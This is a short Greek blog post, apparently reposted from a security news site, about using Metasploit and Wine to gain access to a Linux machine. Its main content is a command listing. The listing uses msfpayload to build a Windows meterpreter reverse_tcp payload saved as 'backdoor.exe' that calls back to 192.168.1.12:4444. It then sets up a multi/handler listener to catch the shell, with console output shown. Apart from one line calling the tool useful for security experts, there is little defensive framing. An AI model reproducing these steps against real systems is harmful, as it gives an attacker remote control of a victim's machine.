Blogger templates

I Support the Bring Them Back Campaign

24 Φεβ 2012

Αποκτήσετε πρόσβαση μέσω μιας εφαρμογής προσομοίωσης Windows στο Linux




Το Metasploit είναι ένα υπέροχο εργαλείο για penetration testing, καθώς περιλαμβάνει μια βάση με exploits για την παραβίαση λειτουργικών συστημάτων, πολύ χρήσιμη για ειδικούς ασφάλειας.
Παρακάτω θα παρακολουθήσετε ένα βίντεο στο οποίο εμφανίζονται τεχνικές παραβίασης για λειτουργικό σύστημα Linux. Στο βίντεο θα μάθετε<…>
πως μέσω μιας εφαρμογής προσομοίωσης Windows, μπορείτε να αποκτήσετε πρόσβαση σε ένα μηχάνημα που χρησιμοποιεί Linux.
Η εφαρμογή αυτή ονομάζεται wine και θα εντοπίσουμε παρακάτω τις ευπάθειες που διαθέτει, οι οποίες μπορούν να γίνουν εκμεταλλεύσιμες έτσι ώστε να παραβιάσουμε ένα μηχάνημα Linux.

Εντολές:
root@bt:~# msfpayload windows/meterpreter/reverse_tcplhost=192.168.1.12 lport=4444 X > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {«lhost»=>»192.168.1.12″, «lport»=>»4444″}
Metasploit commands
msf> use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf  exploit(handler) > set lport 4444
lport => 4444
msf  exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.12:4444 
[*] Starting the payload handler…
Πηγή:secnews.gr



0 σχόλια :

Δημοσίευση σχολίου